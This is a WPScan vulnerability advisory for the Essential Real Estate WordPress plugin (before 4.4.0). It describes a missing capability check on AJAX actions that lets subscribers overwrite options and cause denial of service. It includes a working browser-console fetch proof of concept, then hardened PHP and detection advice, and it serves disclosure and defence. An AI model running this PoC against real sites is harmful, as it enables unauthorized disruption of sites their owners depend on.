wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: 96396A22-F523-4C51-8B72-52BE266988AA
History: Dec 18, 2023 - 12:00 a.m.

Essential Real Estate < 4.4.0 - Subscriber+ Denial of Service via Arbitrary Option Update

Published: 2023-12-18 00:00:00
Author: Krzysztof Zając (CERT PL)
Source: wpscan.com
7
Tags: real estate, wordpress, ajax, denial of service, capability checks

AI Score: 6.4
Confidence: High
EPSS: 0
Percentile: 13.3%

Description

The plugin does not apply proper capability checks on its AJAX actions, which, among other things, allows attackers with a subscriber account to conduct Denial of Service attacks.

PoC

1. Log in, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. Run the following in your browser console:

    fetch("/wp-admin/admin-ajax.php?action=gsf_save_options", {
        "headers": { "content-type": "application/x-www-form-urlencoded" },
        "body": `_wpnonce=${GSF_META_DATA['nonce']}&_current_preset=template`,
        "method": "POST",
    }).then((response) => {
        return response.text();
    }).then((data) => {
        console.log(data);
    });

The same can be achieved via other AJAX actions in the plugin, like "gsf_import_theme_options".
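
The root cause stated in the description is an AJAX handler that is reachable by any authenticated user because it never checks a capability. As an added illustration from the defender's side (this is not the plugin's code; the actual Essential Real Estate handler is not shown on this page), the following PHP contrasts a handler that relies on a nonce alone with one that also enforces a capability check and an allow-list on the submitted value. The hook name reuses the gsf_save_options action from the PoC; the option name gsf_current_preset, the nonce action gsf_nonce and the preset names are assumptions.

```php
<?php
// Added example, not the plugin's own code. Hook name taken from the advisory;
// option name, nonce action and allowed preset values are assumptions.

// Weak pattern: a nonce only proves the request originated from a page of this
// site rendered for a logged-in user. Every account, subscribers included, can
// obtain one, so a nonce check alone lets any user rewrite the option.
function gsf_save_options_weak() {
    check_ajax_referer( 'gsf_nonce', '_wpnonce' );
    $preset = sanitize_key( wp_unslash( $_POST['_current_preset'] ?? '' ) );
    update_option( 'gsf_current_preset', $preset ); // assumed option name
    wp_send_json_success();
}

// Hardened pattern: nonce check, explicit capability check, and the value is
// restricted to a known allow-list before it reaches update_option().
function gsf_save_options_hardened() {
    check_ajax_referer( 'gsf_nonce', '_wpnonce' );

    // Site-wide options may only be changed by users who can manage options.
    // wp_send_json_error() terminates the request, so no return is needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $allowed = array( 'default', 'template' ); // assumed preset names
    $preset  = sanitize_key( wp_unslash( $_POST['_current_preset'] ?? '' ) );
    if ( ! in_array( $preset, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown preset.' ), 400 );
    }

    update_option( 'gsf_current_preset', $preset );
    wp_send_json_success( array( 'preset' => $preset ) );
}

// Register only the hardened handler. The wp_ajax_ prefix (without nopriv)
// limits the action to logged-in users, which is necessary but, as the
// advisory shows, not sufficient without the current_user_can() check.
add_action( 'wp_ajax_gsf_save_options', 'gsf_save_options_hardened' );
```

When reviewing a plugin for this class of bug, search every wp_ajax_ and wp_ajax_nopriv_ callback for a current_user_can() call and treat a handler that writes options with only check_ajax_referer() as a finding. On the operations side, requests to admin-ajax.php carrying this action from accounts below administrator are the signal to alert on.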
